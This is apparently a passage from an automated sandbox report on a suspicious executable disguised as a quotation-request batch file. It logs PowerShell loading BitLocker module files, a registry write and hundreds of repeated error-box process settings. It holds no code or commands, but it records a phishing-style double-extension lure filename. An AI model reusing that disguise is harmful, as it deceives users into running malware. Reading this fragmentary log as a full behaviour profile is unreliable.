Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Stores large binary data to the registry
Source: C:\Windows\System32\wbem\WMIADAP.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\PROVIDERS\Performance Performance Data
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
